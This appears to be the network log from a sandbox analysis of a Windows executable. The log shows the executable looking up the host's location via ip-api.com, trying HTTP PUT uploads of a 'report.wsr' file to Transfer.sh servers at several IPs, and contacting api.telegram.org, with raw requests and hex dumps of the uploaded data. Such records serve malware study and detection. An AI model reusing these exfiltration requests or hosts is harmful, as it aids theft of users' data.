                                                                                                                                                            Dec 8, 2024 13:02:02.913609028 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913774967 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.956656933 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.956808090 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.076311111 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.076611042 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.116591930 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.196140051 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.196350098 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.240564108 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.300745010 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.300900936 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.315716028 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420469046 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420488119 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420562029 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420572042 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420666933 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420679092 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420802116 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420809984 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420821905 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420852900 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420891047 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420902014 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420912027 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421046972 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421103001 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421180964 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421267986 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421395063 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421458960 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.421475887 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.435334921 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.476599932 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.543843985 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.543905973 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.544045925 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.544055939 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.201113939 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.201139927 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.201303959 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:04.201414108 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:04.201977968 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.320868969 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.321219921 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.321302891 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.321546078 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.440834999 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.673583984 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793181896 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793200016 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793297052 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793340921 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793351889 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793399096 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793411970 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793431997 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793452978 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793469906 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793486118 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793495893 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793543100 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793586969 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793601990 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793632030 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.793648958 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912849903 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912863016 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912872076 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912879944 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912894964 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912913084 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912931919 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.912965059 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:04.960530043 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:04.960665941 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.076550007 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.076673985 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.120613098 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.120686054 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.192579031 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.192677021 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.240535021 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.356585026 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.356739998 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.560591936 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.560666084 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:05.800766945 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:05.800826073 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:06.048592091 CET808049734206.166.251.4192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:06.048664093 CET497348080192.168.2.4206.166.251.4
                                                                                                                                                            Dec 8, 2024 13:02:06.288657904 CET808049734206.166.251.4192.168.2.4
Dec 8, 2024 13:02:06.288707972 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:06.532557964 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:06.532654047 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:06.776715994 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:06.776774883 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:07.020615101 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:07.020687103 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:07.264606953 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:07.264664888 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:07.504524946 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:07.504606009 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:07.744618893 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:07.744682074 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:07.984688997 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:07.984797955 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:08.228590012 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:08.228674889 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:08.476634979 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:08.476727962 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:08.720555067 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:08.720733881 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:08.962174892 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:08.962239981 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:09.208873987 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:09.209106922 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:09.448575974 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:09.448679924 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:09.688632011 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:09.688705921 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:09.932770967 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:09.932827950 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:10.172595024 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:10.172642946 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:10.412666082 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:10.412720919 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:10.656552076 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:10.656672955 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:10.896593094 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:10.896645069 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:11.136742115 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:11.136804104 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:11.376579046 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:11.376642942 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:11.625454903 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:11.625507116 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:11.870553017 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:11.870624065 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:12.112819910 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:12.116204977 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:12.356822014 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:12.357103109 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:12.596757889 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:12.600215912 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:12.844643116 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:12.844715118 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:13.084588051 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:13.084654093 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:13.324707031 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:13.328263998 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:13.572572947 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:13.572664022 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:13.815196037 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:13.815382004 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:14.057410002 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:14.058001995 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:14.300554991 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:14.300643921 CET        49734       8080  192.168.2.4      206.166.251.4
Dec 8, 2024 13:02:14.540534973 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:26.214760065 CET         8080      49734  206.166.251.4    192.168.2.4
Dec 8, 2024 13:02:26.220017910 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.341361046 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.341545105 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.341589928 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.460944891 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.689224005 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.808746099 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.808835983 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.808895111 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.808906078 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.808912992 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.808923006 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.808959961 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.808968067 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.808983088 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.808995962 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.809005022 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.809012890 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.809026003 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.809075117 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.809284925 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.809334040 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.928360939 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.928428888 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.928519011 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.928529024 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.928539038 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.928548098 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.928575993 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.928613901 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:26.972634077 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:26.972752094 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:27.092199087 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.092278957 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:27.136682987 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.208523989 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.252624989 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.252691984 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:27.314058065 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.314219952 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:27.372148991 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434016943 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434027910 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434036016 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434046030 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434053898 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434061050 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434165001 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434243917 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434384108 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434393883 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434401035 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434535027 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434775114 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434784889 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.434947014 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435024977 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435033083 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435066938 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435158968 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435206890 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435352087 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435360909 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435622931 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.435666084 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.501051903 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.591255903 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:27.642159939 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:28.197559118 CET         8080      49741  51.159.4.50      192.168.2.4
Dec 8, 2024 13:02:28.251661062 CET        49741       8080  192.168.2.4      51.159.4.50
Dec 8, 2024 13:02:28.339437962 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:28.339466095 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:28.339554071 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:28.348006010 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:28.348017931 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:29.715269089 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:29.715416908 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:29.719862938 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:29.719882011 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:29.720067978 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:29.766352892 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:29.807332993 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:30.267348051 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:30.267396927 CET          443      49742  149.154.167.220  192.168.2.4
Dec 8, 2024 13:02:30.267445087 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:30.269283056 CET        49742        443  192.168.2.4      149.154.167.220
Dec 8, 2024 13:02:31.445288897 CET        49741       8080  192.168.2.4      51.159.4.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 13:01:54.247562885 CET | 63243 | 53 | 192.168.2.4 | 1.1.1.1
Dec 8, 2024 13:01:54.473217964 CET | 53 | 63243 | 1.1.1.1 | 192.168.2.4
Dec 8, 2024 13:02:28.200906992 CET | 63712 | 53 | 192.168.2.4 | 1.1.1.1
Dec 8, 2024 13:02:28.338840961 CET | 53 | 63712 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 8, 2024 13:01:54.247562885 CET | 192.168.2.4 | 1.1.1.1 | 0xe257 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 8, 2024 13:02:28.200906992 CET | 192.168.2.4 | 1.1.1.1 | 0xbcf1 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 8, 2024 13:01:54.473217964 CET | 1.1.1.1 | 192.168.2.4 | 0xe257 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 8, 2024 13:02:28.338840961 CET | 1.1.1.1 | 192.168.2.4 | 0xbcf1 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• api.telegram.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7496 | C:\Users\user\Desktop\BA9qyj2c9G.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 13:01:54.690150976 CET | 85 | OUT | GET /line?fields=query,country HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Dec 8, 2024 13:01:55.772556067 CET | 197 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 12:01:55 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 27
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
    Data Ascii: United States8.46.123.228


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 209.38.221.184 | 8080 | 7496 | C:\Users\user\Desktop\BA9qyj2c9G.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 13:01:56.413141966 CET | 146 | OUT | PUT /yrABY_user%40841618_report.wsr HTTP/1.1
    Host: 209.38.221.184:8080
    Content-Length: 134658
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 13:01:58.312098026 CET | 321 | IN | HTTP/1.1 500 Internal Server Error
    Content-Type: text/plain; charset=utf-8
    Server: Transfer.sh HTTP Server
    X-Content-Type-Options: nosniff
    X-Made-With: <3 by DutchCoders
    X-Served-By: Proudly served by DutchCoders
    Date: Sun, 08 Dec 2024 12:01:58 GMT
    Content-Length: 24
    Connection: close
    Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a
    Data Ascii: Could not save metadata


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 46.235.26.83 | 8080 | 7496 | C:\Users\user\Desktop\BA9qyj2c9G.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 13:01:58.450089931 CET | 144 | OUT | PUT /yrABY_user%40841618_report.wsr HTTP/1.1
    Host: 46.235.26.83:8080
    Content-Length: 134658
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 13:02:02.196607113 CET | 321 | IN | HTTP/1.1 500 Internal Server Error
    Content-Type: text/plain; charset=utf-8
    Server: Transfer.sh HTTP Server
    X-Content-Type-Options: nosniff
    X-Made-With: <3 by DutchCoders
    X-Served-By: Proudly served by DutchCoders
    Date: Sun, 08 Dec 2024 12:02:02 GMT
    Content-Length: 24
    Connection: close
    Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a
    Data Ascii: Could not save metadata


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 147.28.185.29 | 80 | 7496 | C:\Users\user\Desktop\BA9qyj2c9G.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 13:02:02.317780018 CET | 140 | OUT | PUT /yrABY_user%40841618_report.wsr HTTP/1.1
    Host: 147.28.185.29
    Content-Length: 134658
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 13:02:02.673619986 CET | 12360 | OUT | Data Raw: 57 53 52 24 8b 2b 05 10 42 29 90 6d 18 d4 8d ab c2 0e b6 4a 2d 09 c4 71 b4 60 73 bc 6d 50 5b 0e 17 f4 eb 46 7b b9 ef 19 2d d1 30 61 cc be ac 2c 0a 83 b7 ca e3 e1 d5 ef 90 f8 95 06 81 0c d3 96 a7 94 03 4f 94 c7 c2 ae 9e a0 c2 1c e1 19 56 e6 8e 7e
    Data Ascii: WSR$+B)mJ-q`smP[F{-0a,OV~U9-rs>u1Om8=/MWhH.xa="`cT'm!/VKN!L+XZ[2!-KpZ.h+ yZV{`<nffp\#
Dec 8, 2024 13:02:02.793587923 CET | 2472 | OUT | Data Raw: 4e 0e 56 dd 7d a7 6f c5 5e cc cb 8c 61 d8 46 85 96 3c 2e 40 47 d4 46 9a 18 d3 ad 26 5a cb d6 1e 1c 32 52 23 cb c5 13 e4 52 10 e4 e5 8f 47 d7 ed 78 98 e2 86 2d 50 70 ed 35 f7 1a 62 9d d3 c9 86 d2 6d 51 a9 89 7e 04 90 b8 3d 0f 10 ce 5b 43 5c 32 62
    Data Ascii: NV}o^aF<.@GF&Z2R#RGx-Pp5bmQ~=[C\2b?AX2t$1;vvhpDzpsxhknk.nc?O)nde742?s~a vIh_h%E+fc,o)!xCT+fGj&iO
Dec 8, 2024 13:02:02.793663979 CET | 21012 | OUT | Data Raw: e1 65 86 6b f8 88 62 fe 01 1e 8e 0d aa 95 60 32 1f f5 d7 54 cb 32 a3 b9 5c 0b 1c bc b7 2c c2 fa 9f 82 4e e3 24 5f 74 01 3a 51 d1 d9 01 2a 9d bf 86 56 48 58 39 29 0b 3a b3 6d cb c6 f6 b5 12 a4 be f0 72 f7 d3 02 28 aa 04 94 2a c7 c4 28 13 34 4e a2
